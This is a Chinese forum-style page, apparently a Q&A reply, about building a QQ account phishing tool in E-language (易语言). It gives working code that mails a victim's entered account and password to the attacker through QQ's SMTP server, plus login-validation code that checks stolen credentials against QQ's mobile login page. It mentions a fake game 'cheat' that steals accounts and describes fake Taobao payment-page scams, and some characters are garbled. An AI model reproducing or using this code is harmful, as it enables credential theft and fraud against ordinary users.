易语言钓鱼源码

易语言钓鱼源码,第1张

嗯嗯,改的设置对着呢。

但是你貌似没有填端口号,TX的应该是25,因为我填的是25……能发出去

可以这么写:

连接发信服务器 (“smtp.qq.com”, 25,  用户名, 密码)

发送邮件 (“号来了!”, “账号:” + 编辑框2.内容 + #换行符 + “密码:” + 编辑框2.内容, “*@qq.com”,  , ,“*@qq.com”,)

但是,发送的时候360会拦截下来。这个你得注意下,其实你家机子要是固定IP的话,可以做个服务器。还有就是你这个验证根本不行,我账号填个1,密码填个1,那岂不就完事了,还能登上去,你又来一个垃圾。可以加个验证。

'------------------------验证源码

.版本 2

登录网页 = 网页源码编码转换 (温暖HTTP读文件 (“http://pt.3g.qq.com/s?aid=nLogin3gqq&auto=1&s_it=1&g_f=286&sid=”))

' 温前枣暖HTTP读文件 (“http://pt.3g.qq.com/s?aid=nLogin3gqq&auto=1&s_it=1&g_f=286&sid=”))

产生sid = 取文本之间内容 (登录网页, “sid=”, “&”)

登录返回文本 = 进行POST (寻找POST参数 (登录网页, “马上登录”), _启动窗口.编辑框1.内容, _启动窗口.编辑框2.内容)

.判断开始 (寻找文本 (登录返回文本, “登录密码错误”, , 假) > 0)

  延时 (1000)

  密码错误反馈.调用反馈事件 (, , )

.判断 (寻找文本 (登录返回文本, “登录失败,可能系统繁忙,请稍后重试”, , 假) > 0)

  延时 (500)

  帐号错误反馈.调用反馈事件 (, , )

.判断 (寻找文本 (登录返回文本, “您填写的帐号或密码不正确,请重新输入”, , 假) > 0)

  延时 (1000)

  密码错误反馈.调用反馈事件 (, , )

.判断 (寻找文本 (登录返回文本, “您输入的帐号不存在”, , 假) > 0)

  延时 (500)

  帐号错误反馈.调用反馈事件 (, , )

.判断 (寻找文本 (登录返回文本, “登录成功”, , 假) > 0)

  登录成功网页 = 登录返回文本

  sid = 产生sid

  延时 (1000)

  主界面反馈.调用反馈事件 (, , )

.判断 (寻找文本 (登录返回文本, “请输入验证码”, , 假) >粗芹 0)

  验证码图片地址 = 取文本之间内容 (登录返回文本, “<img src=” + #引号, #引号)

  延时 (1000)

  验证码反馈.调用反馈事件 (, , )

  .如果 (全局验证码内容 = “”)

      _启动窗口.可视 = 真

  .否则

      输入验证码返回文本 = 进行POST (寻找POST参数 (登录返回文岩悔毕本, “马上登录”), , , 全局验证码内容)

      .判断开始 (寻找文本 (输入验证码返回文本, “登录成功”, , 假) > 0)

          登录成功网页 = 输入验证码返回文本

          sid = 产生sid

          延时 (1000)

          主界面反馈.调用反馈事件 (, , )

      .默认

          延时 (1000)

          密码错误反馈.调用反馈事件 (, , )

' -----------------接下来不是源码了

这里还要用到一个温暖HTTP应用模块,我给你传上来吧。

我自己写了个不带验证的奥拉星“外挂”,你可以看看,嘻嘻……(其实还是盗号的,只是不发送过来)

先前只是为了获取你的帐号密码。

现在就直接要你的钱。

常见的就是,骗子发首颤扰布价格很低的东东,引起你的兴趣,然后者旦给你一个连接。

连洞族接上面是仿造掏宝的网页,你确认付款后,钱就直接到骗子手上。

整体来说,做这个就是专门骗别人钱财的。


欢迎分享,转载请注明来源:内存溢出

原文地址:https://54852.com/yw/12329423.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2023-05-22
下一篇2023-05-22

发表评论

登录后才能评论

评论列表(0条)

    保存